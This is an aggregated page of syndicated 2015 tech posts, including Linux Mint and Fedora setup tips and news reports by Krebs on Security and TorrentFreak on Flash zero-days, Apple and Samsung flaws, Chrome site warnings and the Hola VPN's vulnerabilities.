Looking at the vulnerabilities that Adobe’s Flash player has (one was disclosed and fixed this week), I would suggest staying away from the Flash plugin and instead use Google Chrome which comes with Flash support. You can download Google Chrome from their site and install it the way you would install any binary package, just make sure to choose the right architecture (32bit or 64bit for Ubuntu). There are additional benefits of using Chrome: it will also allow you to access services like Netflix which are not available for Firefox. On top of that, you will also gain access to the supported Chrome Apps from the Web Store

Install Cloud services

Google Drive is still not available for Linux, but there is a third-party solution called inSync which can be used to integrate Google Drive with your Linux Mint system. It’s a nifty solution which, unlike Google Drive, does have a one-time fee. You can easily install inSync by downloading either the binary or by adding its repository to the system from the official download page. I would strongly suggest to never install any software from unofficial or third-party sites.

These are not the only solutions for Linux users. Almost all major cloud services (except for Microsoft OneDrive) are available for Linux users. You can easily install Dropbox, ownCloud or Seafile on your system by downloading the binaries from the official sites.

Change search engine to Google

The Linux Mint team has commercial deals with several search providers which share revenues with the project. These search engines have been integrated with the Firefox browser, Yahoo! being the default one. That doesn’t mean you are locked into the default search engine Yahoo! which is powered by Microsoft Bing.

In my experience I found that the option to switch to Google has been buried down deep, making it a tad difficult for a new user to switch. After struggling with it for a while I settled down with an easier solution and that’s what I would recommend others. Open Firefox and visit ‘www.google.com‘; you will notice a blue ribbon offering to change your search engine to Google.

lm google

Click on ‘Yes, show me’ from the ribbon. Next click on the + icon on the search box and add Google.

Adding Google as your default search in Firefox

Then click on ‘Change Search Settings’ and choose Google from the list.

Step 3 in changing your default search to google.

You may also want to un-check ‘provide search suggestions’ so that your search box is clean and clutter free.

Now all your searches belong to Google.

Sync and protect your password with Firefox

There is now a built-in feature of Firefox which can save your passwords (and much more) securely on their servers so you won’t have to write them down or remember them. Open Firefox and then click on the three bars on the right.

Open Firefox and then click on the three bars on the right.

There you will see the option ‘sign in to sync‘. Follow the instructions and you are all set. You can choose what kind of stuff you want to be synced, which includes passwords, bookmarks, Tabs, History, Addons and preferences. The good news is you won’t have to reinstall all add-ons and change preferences when you change OS or move between systems. Once you log into the Firefox account, everything will be synced across machines.

Use Thunderbird Profile

I am a heavy Thunderbird user and use it to its full potential; thanks to add-ons like calendar. One of the lesser known, but most interesting, features of Thunderbird is the ability to easily change the location of data on the system. Now the question would be: why would I need it? I multi-boot with different distributions and it’s a waste of time to set-up Thunderbird in each distro and then waste precious space on the ‘home’ of each distro, only to have multiple copies of the same data on the same system.

I keep all of my data on a separate hard drive, outside ‘home’ directories. This drive is accessible by all distros, which makes it easier to work on the same files irrespective of the OS I am currently running. And that’s where I keep my Thunderbird data; so the same data is accessible across all distros eliminating duplication.

I use the ‘Profile’ feature of Thunderbird to achieve this. It also comes in handy when you hop from one distro to another as you won’t have to reconfigure your Thunderbird on each new distro.

It’s recommended to setup profile before you run Thunderbird for the first time. To configure Thunderbird Profile, open Terminal and run this command:

thunderbird -p

You will be greeted by this window.

Linux Mint Thunderbird profile window.

Click on ‘Create Profile ‘, give it a name and then ‘Choose Folder’. This will be the directory where all of your Thunderbird data will be saved. Once done, click on ‘finish’ and you are set. Next time when you boot into another system, run the same command, create the profile and then point it to the folder you created previously. All your email accounts, settings, and add-ons will be there, automatically. If you run multiple distros, just create a profile on each distro and point it to the same directory.

Setting up Trackpad

I did find it a bit frustrating to connect the Magic Trackpad to Linux Mint 17.2. Linux Mint asks you to enter a PIN when you try to connect devices like Trackpad; a task you can’t perform from a trackpad. What you need to do is choose the PIN option and try with ‘0000’ which ‘might’ connect the device. I had to make several attempts because the moment the device was detected it would switch to the default ‘enter PIN’ option. I think Linux Mint and should make it easy to connect such devices. When I tried it on Mac OS X, it detected that it was a Trackpad and instead of offering to enter PIN defaulted to ‘0000’ and paired with the device immediately.

Configuring the trackpad

Another issue I faced with Trackpad was that scrolling was not working out of the box. To enable that, open System Settings and go to TouchPad settings and select ‘vertical Scrolling’ (it should be selected by default).

Once you enabled that, you find that it’s not working on Firefox. To get it to work, open a Firefox browser and type ‘about:config‘ in the address bar. Firefox will throw a warning at you – ignore it and proceed. Then search for ‘gesture.swipe‘ and you will come across four results. Click on each, one by one, and delete the ‘value‘ field; scrolling will start working on Firefox.

How to upgrade from the previous version

If you are still on Linux Mint 17.1, then you won’t have to re-format your system and run a fresh install of Linux Mint 17.2. Now you can easily upgrade between major releases. Before running such an upgrade make sure to back-up your data so that, in case of a failed update, you don’t lose it. Run a system update to ensure all your packages are up-to-date. If there are applications that you don’t need, uninstall them to keep your system lean and mean.

Let’s start the major upgrade: Open ‘Update Manager’, refresh it, and install all the checked packages there.

Open 'Update Manager', refresh it, and install all the checked packages there.

Once everything is up-to-date, click on the ‘Edit’ menu and choose the third option (if available) to upgrade to the next release.

 Click on the 'Edit' menu and choose the third option (if available) to upgrade to the next release.

Then just follow the instructions and enjoy the latest version of Linux Mint.

That’s pretty much all that you need to do on Linux Mint to get most out of this great Linux distribution. There used to be a long list of things ‘to do’ after installing Linux Mint, but these days most things, such as configuring printers, work out of the box.

Now it’s your turn, let us know what are the things that you do after installing Linux Mint!

Krebs on Security: Third Hacking Team Flash Zero-Day Found

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

For the third time in a week, researchers have discovered a zero-day vulnerability in Adobe’s Flash Player browser plugin. Like the previous two discoveries, this one came to light only after hackers dumped online huge troves of documents stolen from Hacking Team — an Italian security firm that sells software exploits to governments around the world.

News of the latest Flash flaw comes from Trend Micro, which said it reported the bug (CVE-2015-5123) to Adobe’s Security Team. Adobe confirmed that it is working on a patch for the two outstanding zero-day vulnerabilities exposed in the Hacking Team breach.

We are likely to continue to see additional Flash zero day bugs surface as a result of this breach. Instead of waiting for Adobe to fix yet another flaw in Flash, please consider removing or at least hobbling this program.

flashpotus

Google Chrome comes with its own version of Flash pre-installed, but disabling it is easy enough. On a Windows, Mac, Linux or Chrome OS installation of Chrome, type “chrome:plugins” into the address bar, and on the Plug-ins page look for the “Flash” listing: To disable Flash, click the disable link (to re-enable it, click “enable”).

Windows users can remove Flash from non-Chrome browsers from the Add/Remove Programs panel, and/or using this Flash Removal Tool. Note that you must exit out of all Web browsers before running the tool. To verify that Flash has been removed, visit this page; if it says your browser needs Flash, you’ve successfully removed it.

For Mac users, AppleInsider carries a story today that has solid instructions for nixing the program from OS X once and for all.

“Flash has become such an information security nightmare that Facebook’s Chief Security Officer called on Adobe to sunset the platform as soon as possible and ask browser vendors to forcibly kill it off,” AppleInsider’s Shane Cole writes. “Though most exploits are targeted at Windows, Mac users are not invincible.”

I removed Flash entirely more than a month ago and haven’t missed the program one bit. Unfortunately, some sites — including many government Web sites  — may prompt users to install Flash in order to view certain content. Perhaps it’s time for a petition to remove Flash Player from U.S. Government Web sites altogether? If you agree, make your voice heard here.  For more on spreading the word about Flash, see the campaign at OccupyFlash.org.

If you decide that removing Flash altogether or disabling it until needed is impractical, there are in-between solutions. Script-blocking applications like Noscript and ScriptSafe are useful in blocking Flash content, but script blockers can be challenging for many users to handle.

Another approach is click-to-play, which is a feature available for most browsers (except IE, sadly) that blocks Flash content from loading by default, replacing the content on Web sites with a blank box. With click-to-play, users who wish to view the blocked content need only click the boxes to enable Flash content inside of them (click-to-play also blocks Java applets from loading by default).

Windows users who decide to keep Flash installed and/or enabled also should take full advantage of the Enhanced Mitigation Experience Toolkit (EMET), a free tool from Microsoft that can help Windows users beef up the security of third-party applications.

TorrentFreak: Chrome Blocks Major Torrent Sites Over “Harmful Programs”

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

chromeThere’s a slight panic breaking out among Google Chrome users. Over the past few hours the browser has started to block access to several of the most popular torrent sites including KickassTorrents, Torrentz, ExtraTorrent and RARBG.

Instead of a page filled with the latest torrents, visitors are presented with an ominous red warning banner.

“The site ahead contains harmful programs,” Google Chrome informs its users.

“Attackers on kat.cr might attempt to trick you into installing programs that harm your browsing experience (for example, by changing your homepage or showing extra ads on sites you visit),” the warning adds.

harm

Google doesn’t specify what the issue is with the sites in question. The “Safe Browsing” diagnostics pages only list the sites as “suspicious” and note that “third parties can add malicious code to legitimate sites.” in some cases.

nomalice

The owners of the sites in question are clueless about the source of the problem. RARBG’s operator informs TF that there is no additional information available in Google’s Webmaster tools either.

“I hope Google comes to its senses and actually allows webmasters to see what the issue is in their webmasters tools,” RARBG’s operator informs us.

ExtraTorrent is not aware of any issues either and notes that the malware Google reportedly found are false positives.

“There is no malicious software and you are still able to load ExtraTorrent in Mozilla Firefox, Opera, Chromium and other browsers,” the ExtraTorrent team says.

“We’ll contact Google to resolve the issue shortly,” they add.

Interestingly, several proxy sites, such as torrentz-proxy.com, still work fine and don’t show the warning screen in Google Chrome.

Since Google doesn’t mention “malicious software” as the reason for the warning, it was most likely triggered by the “unsafe” ads many torrent sites run. These are typically linked to toolbar software or other unwanted programs.

We reached out to Google to find out more about the sudden torrent site blocks, but we have yet to receive a response.

Chrome users who want to bypass the warning can do so by clicking the details link, or disable Chrome’s malware warnings altogether.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and the best VPN services.

Krebs on Security: Adobe to Patch Hacking Team’s Flash Zero-Day

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Adobe Systems Inc. says its plans to issue a patch on Wednesday to fix a zero-day vulnerability in its Flash Player software that is reportedly being exploited in active attacks. The flaw was disclosed publicly over the weekend after hackers broke into and posted online hundreds of gigabytes of data from Hacking Team, a controversial Italian company that’s long been accused of helping repressive regimes spy on dissident groups.

A knowledge base file stolen from Hacking Team explaining how to use the company's zero-day Flash exploit.

A knowledge base file stolen from Hacking Team explaining how to use a Flash exploit developed by the company.

In an advisory published today, Adobe said “a critical vulnerability (CVE-2015-5119) has been identified in Adobe Flash Player 18.0.0.194 and earlier versions for Windows, Macintosh and Linux. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system.”

Several reports on Twitter suggested the exploit could be used to bypass Google Chrome‘s protective “sandbox” technology, a security feature that forces the program to run in a heightened security mode designed to block attacks that target vulnerabilities in Flash. A spokesperson for Google confirmed that attackers could evade the Chrome sandbox by using the Flash exploit in tandem with another Windows vulnerability that appears to be unpatched at the moment. Google also says its already in the process of pushing the Flash fix out to Chrome users.

The Flash flaw was uncovered after Hacking Team’s proprietary information was posted online by hacktivists seeking to disprove the company’s claims that it does not work with repressive regimes (the leaked data suggests that Hacking Team has contracted to develop exploits for a variety of countries, including Egypt, Lebanon, Ethiopia, Sudan and Thailand). Included in the cache are several exploits for unpatched flaws, including apparently a Windows vulnerability.

According to new research from security firm Trend Micro, there is evidence that the Flash bug is being exploited in active attacks.

“A separate attack against one of these vulnerabilities shows that not sharing the discovery of vulnerabilities with the vendor or broader security community leaves everyone at risk,” wrote Christopher Budd, global threat communications manager at Trend. “This latest attack is yet another demonstration that Adobe is a prime target for exploit across commercial and consumer IT systems.”

There is no question that Adobe Flash Player is a major target of attackers. This Wednesday will mark the seventh time in as many months that Adobe has issued an emergency update to fix a zero-day flaw in Flash Player (the last one was on June 23).

Perhaps a more sane approach to incessantly patching Flash Player is to remove it altogether. Late last month, I blogged about my experience doing just that, and found I didn’t miss the program much at all. In any case, I’ll update this post once Adobe has issued an official fix.

Krebs on Security: Emergency Patch for Adobe Flash Zero-Day

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Adobe Systems Inc. today released an emergency update to fix a dangerous security hole in its widely-installed Flash Player browser plugin. The company warned that the vulnerability is already being exploited in targeted attacks, and urged users to update the program as quickly as possible.

In an advisory issued Tuesday morning, Adobe said the latest version of Flash — v. 18.0.0.194 on Windows and Mac OS X — fixes a critical flaw (CVE-2015-3113) that is being actively exploited in “limited, targeted attacks.” The company said systems running Internet Explorer for Windows 7 and below, as well as Firefox on Windows XP, are known targets of these exploits.

If you’re unsure whether your browser has Flash installed or what version it may be running, browse to this link. Adobe Flash Player installed with Google Chrome, as well as Internet Explorer on Windows 8.x, should automatically update to the latest version. To force the installation of an available update on Chrome, click the triple bar icon to the right of the address bar, select “About Google” Chrome, click the apply update button and restart the browser.

The most recent versions of Flash should be available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.)

In lieu of patching Flash Player yet again, it might be worth considering whether you really need to keep Flash Player installed at all. In a happy coincidence, earlier today I published a piece about my experience going a month without having Flash Player installed. The result? I hardly missed it at all.

Krebs on Security: A Month Without Adobe Flash Player

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

I’ve spent the better part of the last month running a little experiment to see how much I would miss Adobe‘s buggy and insecure Flash Player software if I removed it from my systems altogether. Turns out, not so much.

brokenflash-aBrowser plugins are favorite targets for malware and miscreants because they are generally full of unpatched or undocumented security holes that cybercrooks can use to seize complete control over vulnerable systems. The Flash Player plugin is a stellar example of this: It is among the most widely used browser plugins, and it requires monthly patching (if not more frequently).

It’s also not uncommon for Adobe to release emergency fixes for the software to patch flaws that bad guys started exploiting before Adobe even knew about the bugs. This happened most recently in February 2015, and twice the month prior. Adobe also shipped out-of-band Flash fixes in December and November 2014.

Time was, Oracle’s Java plugin was the favorite target of exploit kits, software tools made to be stitched into hacked or malicious sites and foist on visiting browsers a kitchen sink of exploits for various plugin vulnerabilities. Lately, however, it seems to pendulum has swung back in favor of exploits for Flash Player. A popular exploit kit known as Angler, for example, bundled a new exploit for a Flash vulnerability just three days after Adobe fixed it in April 2015.

So, rather than continue the patch madness and keep this insecure software installed, I decided to the pull the…er…plugin. I tend to (ab)use different browsers for different tasks, and so uninstalling the plugin was almost as simple as uninstalling Flash, except with Chrome, which bundles its own version of Flash Player. Fear not: disabling Flash in Chrome is simple enough. On a Windows, Mac, Linux or Chrome OS installation of Chrome, type “chrome:plugins” into the address bar, and on the Plug-ins page look for the “Flash” listing: To disable Flash, click the disable link (to re-enable it, click “enable”).

In almost 30 days, I only ran into just two instances where I encountered a site hosting a video that I absolutely needed to watch and that required Flash (an instructional video for a home gym that I could find nowhere else, and a live-streamed legislative hearing). For these, I opted to cheat and load the content into a Flash-enabled browser inside of a Linux virtual machine I have running inside of VirtualBox. In hindsight, it probably would have been easier simply to temporarily re-enable Flash in Chrome, and then disable it again until the need arose.

If you decide that removing Flash altogether or disabling it until needed is impractical, there are in-between solutions. Script-blocking applications like Noscript and ScriptSafe are useful in blocking Flash content, but script blockers can be challenging for many users to handle.

Another approach is click-to-play, which is a feature available for most browsers (except IE, sadly) that blocks Flash content from loading by default, replacing the content on Web sites with a blank box. With click-to-play, users who wish to view the blocked content need only click the boxes to enable Flash content inside of them (click-to-play also blocks Java applets from loading by default).

Windows users who decide to keep Flash installed and/or enabled also should take full advantage of the Enhanced Mitigation Experience Toolkit (EMET), a free tool from Microsoft that can help Windows users beef up the security of third-party applications.

Krebs on Security: Critical Flaws in Apple, Samsung Devices

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Normally, I don’t cover vulnerabilities about which the user can do little or nothing to prevent, but two newly detailed flaws affecting hundreds of millions of Android, iOS and Apple products probably deserve special exceptions.

keychainThe first is a zero-day bug in iOS and OS X that allows the theft of both Keychain (Apple’s password management system) and app passwords. The flaw, first revealed in an academic paper (PDF) released by researchers from Indiana University, Peking University and the Georgia Institute of Technology, involves a vulnerability in Apple’s latest operating system versions that enable an app approved for download by the Apple Store to gain unauthorized access to other apps’ sensitive data.

“More specifically, we found that the inter-app interaction services, including the keychain…can be exploited…to steal such confidential information as the passwords for iCloud, email and bank, and the secret token of Evernote,” the researchers wrote.

The team said they tested their findings by circumventing the restrictive security checks of the Apple Store, and that their attack apps were approved by the App Store in January 2015. According to the researchers, more than 88 percent of apps were “completely exposed” to the attack.

News of the research was first reported by The Register, which reported that Apple was first notified in October 2014 and that in February 2015 the company asked researchers to hold off disclosure for six months.

“The team was able to raid banking credentials from Google Chrome on the latest Mac OS X 10.10.3, using a sandboxed app to steal the system’s keychain and secret iCloud tokens, and passwords from password vaults,” The Register wrote. “Google’s Chromium security team was more responsive and removed Keychain integration for Chrome noting that it could likely not be solved at the application level. AgileBits, owner of popular software 1Password, said it could not find a way to ward off the attacks or make the malware ‘work harder’ some four months after disclosure.”

A story at 9to5mac.com suggests the malware the researchers created to run their experiments can’t directly access existing keychain entries, but instead does so indirectly by forcing users to log in manually and then capturing those credentials in a newly-created entry.

“For now, the best advice would appear to be cautious in downloading apps from unknown developers – even from the iOS and Mac App Stores – and to be alert to any occasion where you are asked to login manually when that login is usually done by Keychain,” 9to5’s Ben Lovejoy writes.

SAMSUNG KEYBOARD FLAW

Separately, researchers at mobile security firm NowSecure disclosed they’d found a serious vulnerability in a third-party keyboard app that is pre-installed on more than 600 million Samsung mobile devices — including the recently released Galaxy S6 — that allows attackers to remotely access resources like GPS, camera and microphone, secretly install malicious apps, eavesdrop on incoming/outgoing messages or voice calls, and access pictures and text messages on vulnerable devices.

The vulnerability in this case resides with an app called Swift keyboard, which according to researcher Ryan Welton runs from a privilege account on Samsung devices. The flaw can be exploited if the attacker can control or compromise the network to which the device is connected, such as a wireless hotspot or local network.

“This means that the keyboard was signed with Samsung’s private signing key and runs in one of the most privileged contexts on the device, system user, which is a notch short of being root,” Welton wrote in a blog post about the flaw, which was first disclosed at Black Hat London on Tuesday, along the release of proof-of-concept code.

Welton said NowSecure alerted Samsung in November 2014, and that at the end of March Samsung reported a patch released to mobile carriers for Android 4.2 and newer, but requested an additional three months deferral for public disclosure. Google’s Android security team was alerted in December 2014.

“While Samsung began providing a patch to mobile network operators in early 2015, it is unknown if the carriers have provided the patch to the devices on their network,” Welton said. “In addition, it is difficult to determine how many mobile device users remain vulnerable, given the devices models and number of network operators globally.” NowSecure has released a list of Samsung devices indexed by carrier and their individual patch status.

Samsung issued a statement saying it takes emerging security threats very seriously.

“Samsung KNOX has the capability to update the security policy of the phones, over-the-air, to invalidate any potential vulnerabilities caused by this issue. The security policy updates will begin rolling out in a few days,” the company said. “In addition to the security policy update, we are also working with SwiftKey to address potential risks going forward.”

A spokesperson for Google said the company took steps to mitigate the issue with the release of Android 5.0 in November 2014.

“Although these are most accurately characterized as application level issues, back with Android 5.0, we took proactive measures to reduce the risk of the issues being exploited,” Google said in a statement emailed to KrebsOnSecurity. “For the longer term, we are also in the process of reaching out to developers to ensure they follow best practices for secure application development.”

SwiftKey released a statement emphasizing that the company only became aware of the problem this week, and that it does not affect its keyboard applications available on Google Play or Apple App Store. “We are doing everything we can to support our long-time partner Samsung in their efforts to resolve this important security issue,” SwiftKey said in a blog post.

The Hacker Factor Blog: Late Night Programming

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

I’ve been spending my evenings working on various tweaks and possible enhancements to the FotoForensics site. Some of these experiments have worked out really well, some have a few problems, and some are still in the “learning curve” phase.

Associations

One of my fun projects is related to the trend detector. I am using vis.js to display relationships that represent various types of trends. This results in very cool association graphs!

This snapshot shows related clusters that formed after three days. The actual graph is interactive. I can click on any node to identify more information about it. I like the way it displays and it really helps identify various clusters of related data. However, this tool really isn’t practical for a public release because of two big problems.

The first problem is speed. If there are only a few nodes, then it renders very quickly. A few hundred makes it pause before displaying as it initially stabilizes the graph. But a few thousand? Start it up and go to lunch… it should be done when you get back. While vis.js does a great job at visualizing the data, this JavaScript library really isn’t fast enough for my data set. Ideally, I want to generate this kind of association graph with 10,000 nodes or more, but the browser really can’t handle it. (Vis.js has an option to group clusters until you zoom in, but that loses the global visual representation.)

The second problem is specifically a browser issue. The vis.js library uses a canvas element for rendering. On my old Chrome 21.x browser, it renders great! Fast and easy to use. However, the default Chromium for Ubuntu 14.04 (Chromium 5) won’t render anything — you just see a black background and it complains about a JavaScript error in vis.js (but there is no error). Chrome 43 for Windows and Firefox 37 for Ubuntu both have memory leaks related to the canvas tag. They will render the first graph without a problem. If you reload the page and open another graph, then it becomes slow. A third reload makes it horribly slow. And by the 4th or 5th reload, the browser hangs. Even closing the tab (but not the browser) between reloads is not enough to resolve this issue.

I’m not the only person to notice this memory leak. It seems to impact newer versions of Firefox, Chrome, and Chromium, dating back more than a year. (Examples: #1, #2, #3.) I suspect that Safari and other WebKit browsers may have the same problem.

And before someone asks… Yes, I tried the latest-greatest versions of Chrome and Firefox. Both crash on Ubuntu 14.04 before they can load any pages. (These are unstable browser ports.) On Windows, they still have the memory leak. For right now, I’m only using this vis.js code on an old Chrome browser that predates the memory leak. Ideally I’d like an interactive web-based solution that can handle 10,000 nodes, but that doesn’t seem likely in the near future.

Streaming

I’ve been spending some time trying to wrap my head around WebRTC. That’s the interactive web technology that permits video and audio sharing. My long-term goal is to configure a WebRTC server for FotoForensics, where I can share my browser window and conduct online training sessions for specific clients, research partners, and occasional guests. (This isn’t intended for the public FotoForensics server. This is more for the private servers that have more features and really requires training sessions.)

I’ve finally wrapped my head around the WebRTC, STUN, and TURN relationships that are required for enabling this technology. There are dozens of web pages with overviews and tutorials, but none of them are very good or detailed. And I still need to figure out how to do things like encryption. (Some docs say that the traffic is automagically encrypted, but I cannot find details about how this works.)

Installing, configuring, and deploying is another complex issue. While there are a few ready-to-go installation packages, I haven’t found them easy to customize. For example, I have my own login management system but I cannot figure out how to integrate it. I want to make sure users cannot create their own private chat rooms, but most code enables arbitrary room allocations. And I want to share either an app (browser) or a desktop and not a video camera, but I cannot figure out how to do that. In some cases, I may just want to share audio without video, or audio with a text-chat window. In other cases, I want users to be able to share their desktops with me so that I can help diagnose content. But I haven’t figured out how to do any of these either.

I have also played with external systems, like Google Hangouts, GoToMeeting, and WebEx. I like the speed, I like the flow, and I like the features like a text-based chat window and Hangout’s live annotations. But I don’t like the idea of sending anything related to my technologies through a third party; all communications should go direct from my server and my desktop computer to the other member’s computers. I want no dependencies on any external third-party services. Also, anything that requires installing special software as a plugin or an app is a show-stopper. I need to support a lot of different platforms, and requiring every user to install a plugin or app is not a platform independent solution.

Clouds

Outside of the graphical arena, I’ve been looking more at the various users who attack my site or violate the terms of service. If I can identify trends, then I can address them and cut down on abuses.

Recently I noticed that some of these abusers are using cloud service providers. So, I decided to map out which services they use. I really expected them to be evenly distributed across the various cloud solutions, but that is definitely not the case.

Some of the biggest cloud providers, like CloudFlare, Rackspace, Softlayer, and Microsoft’s Azure, do not show up at all in my lists of abusive sources. I assume that this means that they are very good at policing their users. (Either that, or these services are too expensive for the riff raff.) The cloud services offered by Google and Amazon do not have many violators, but nearly all of their violators are associated with hostile network attacks. These are systems that are explicitly trying to compromise other online computers. And in the case of Google, they have a few hostile accounts that have been going at it for at least a few months. Either these cloud services have not noticed that their users are hostile, or do not care about stopping outbound attacks.

In contrast to Google and Amazon, Versaweb, GTT/nLayer, and a few others are mostly associated with proxies that are used to violate my terms of service. (I.e., porn uploaders.) This makes it really easy to identify and I can flag their content as potential violations. I should have a new autoban rule implemented in the near future.

More Changes

I’m still trying to finish up and deploy a few other technologies. Some of these will better protect my site, while others will make the site more convenient for users and analysts. Whenever I deploy an improvement to the site, I end up learning something new, and that may lead to additional fun research topics. I am definitely looking forward to these behind-the-scenes updates and whatever surprises they may bring.

Krebs on Security: Adobe, Microsoft Issue Critical Security Fixes

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Adobe today released software updates to plug at least 13 security holes in its Flash Player software. Separately, Microsoft pushed out fixes for at least three dozen flaws in Windows and associated software.

brokenwindowsThe bulk of the flaws Microsoft addressed today (23 of them) reside in the Internet Explorer Web browser. Microsoft also issued fixes for serious problems in Office, the Windows OS itself and Windows Media Player, among other components. A link to an index of the individual Microsoft updates released today is here.

As it normally does on Patch Tuesday, Adobe issued fixes for its Flash and AIR software, plugging a slew of dangerous flaws in both products. Flash continues to be one of the more complex programs to manage and update on a computer, mainly because its auto-update function tends to lag the actual patches by several days at least (your mileage may vary), and it’s difficult to know which version is the latest.

If you’re unsure whether your browser has Flash installed or what version it may be running, browse to this link. Users of the Adobe Flash Player Desktop Runtime for Windows and Macintosh should update to Adobe Flash Player 18.0.0.160. Adobe Flash Player installed with Google Chrome, as well as Internet Explorer onWindows 8.x, should automatically update to version 18.0.0.160, although Chrome users on Mac systems will find 18.0.0.161 is actually the latest version, according to Adobe. To force the installation of an available update, click the triple bar icon to the right of the address bar, select “About Google” Chrome, click the apply update button and restart the browser.

brokenflash-a

The most recent versions of Flash should be available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.). See this graphic for the full Adobe version release.

Most applications bundled with Adobe AIR should check for updates on startup. If prompted, please download and install the AIR update. If you need to update manually, grab the latest version here.

As usual, please sound off in the comments section if you experience any issues applying any of these patches.

TorrentFreak: Hola VPN Already Exploited By “Bad Guys”, Security Firm Says

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

After a flurry of reports, last week the people behind geo-unblocking software Hola were forced to concede that their users’ bandwidth is being sold elsewhere for commercial purposes. But for the Israel-based company, that was the tip of the iceberg.

Following an initial unproofed report that the software operates as a botnet, this weekend researchers published an advisory confirming serious problems with the tool.

“The Hola Unblocker Windows client, Firefox addon, Chrome extension and Android application contain multiple vulnerabilities which allow a remote or local attacker to gain code execution and potentially escalate privileges on a user’s system,” the advisory reads.

Yesterday and after several days of intense pressure, Hola published a response in which it quoted Steve Jobs and admitted that mistakes had been made. Hola said that it would now be making it “completely clear” to its users that their resources are being used elsewhere in exchange for a free product.

Hola also confirmed that two vulnerabilities found by the researchers at Adios-Hola had now been fixed, but the researchers quickly fired back.

“We know this to be false,” they wrote in an update. “The vulnerabilities are *still* there, they just broke our vulnerability checker and exploit demonstration. Not only that; there weren’t two vulnerabilities, there were six.”

With Hola saying it now intends to put things right (it says it has committed to an external audit with “one of the big 4 auditing companies”) the company stood by its claims that its software does not turn users’ computers into a botnet. Today, however, an analysis by cybersecurity firm Vectra is painting Hola in an even more unfavorable light.

In its report Vectra not only insists that Hola behaves like a botnet, but it’s possible it has malicious features by design.

“While analyzing Hola, Vectra Threat Labs researchers found that in addition to behaving like a botnet, Hola contains a variety of capabilities that almost appear to be designed to enable a targeted, human-driven cyber attack on the network in which an Hola user’s machine resides,” the company writes.

“First, the Hola software can download and install any additional software without the user’s knowledge. This is because in addition to being signed with a valid code-signing certificate, once Hola has been installed, the software installs its own code-signing certificate on the user’s system.”

If the implications of that aren’t entirely clear, Vectra assists on that front too. On Windows machines, the certificate is added to the Trusted Publishers Certificate Store which allows *any code* to be installed and run with no notification given to the user. That is frightening.

Furthermore, Vectra found that Hola contains a built-in console (“zconsole”) that is not only constantly active but also has powerful functions including the ability to kill running processes, download a file and run it whilst bypassing anti-virus software, plus read and write content to any IP address or device.

“These capabilities enable a competent attacker to accomplish almost anything. This shifts the discussion away from a leaky and unscrupulous anonymity network, and instead forces us to acknowledge the possibility that an attacker could easily use Hola as a platform to launch a targeted attack within any network containing the Hola software,” Vectra says.

Finally, Vectra says that while analyzing the protocol used by Hola, its researchers found five different malware samples on VirusTotal that contain the Hola protocol. Worryingly, they existed before the recent bad press.

“Unsurprisingly, this means that bad guys had realized the potential of Hola before the recent flurry of public reports by the good guys,” the company adds.

For now, Hola is making a big show of the updates being made to its FAQ as part of its efforts to be more transparent. However, items in the FAQ are still phrased in a manner that portrays criticized elements of the service as positive features, something that is likely to mislead non-tech oriented users.

“Since [Hola] uses real peers to route your traffic and not proxy servers, it makes you more anonymous and more secure than regular VPN services,” one item reads.

How Hola will respond to Vectra’s latest analysis remains to be seen, but at this point there appears little that the company can say or do to pacify much of the hardcore tech community. That being said, if Joe Public still can’t see the harm in a free “community” VPN operating a commercial division with full access to his computer, Hola might settle for that.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and anonymous VPN services.

Linux How-Tos and Linux Tutorials: 11 Things to do After Installing Fedora 22

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Swapnil Bhartiya. Original post: at Linux How-Tos and Linux Tutorials

Fedora 22 is certainly an exciting release for the hard core Fedora fans. And it has more than enough glitter to attract a potential new user.

One of the most notable improvements includes the arrival of DNF which replaces the aging Yum. In my own experience DNF is faster and more memory efficient than Yum. It looks like we have an answer to apt-get in Fedora land.

Since Fedora is primarily a Gnome distro, you will notice the brand new and shiny Gnome 3.16. There are massive improvements in Gnome 3.16 including the brand new notification system, the improved Nautilus (Files) and image viewer which removes all the chrome to focus on the image itself.

One of the most exciting tools in Fedora is the introduction of Vagrant which helps developers in getting started with virtualized environments quickly and easily.

As usual it’s a polished release of the distro with a lot of news features which we will cover in a detailed review next week.

Every operating system whether it be Mac OS X, Windows or Fedora needs some work to customize to serve its user. However, unlike its proprietary counterparts, Fedora comes with quite a lot of software pre-installed so you won’t have to do that much work.

Here are some of the things that I do after installing Fedora on a system. None of it is mandatory and most of it is targeted to an average user. You will be able to use Fedora without doing any of it, but these tips can help improve your experience with the distro. So without further ado let’s get started.

Update your system

First of all we need to update the system. A lot of packages have received updates in the time between this latest update and when you installed Fedora on your system. To ensure your system is safe and secure you must keep your system up-to-date. With Fedora 22, ‘yum’ is on its way out and ‘dnf’ is replacing it, so we will be using ‘dnf’ instead of ‘yum’ to perform many tasks.

To install updates on your system run the following command:

sudo dnf update

Install extra repositories

As it’s widely known, many Linux distributions can’t ship a variety of packages through official repositories due to licences and patents. On a Fedora system you can get access to such packages by installing RPM Fusion repository.

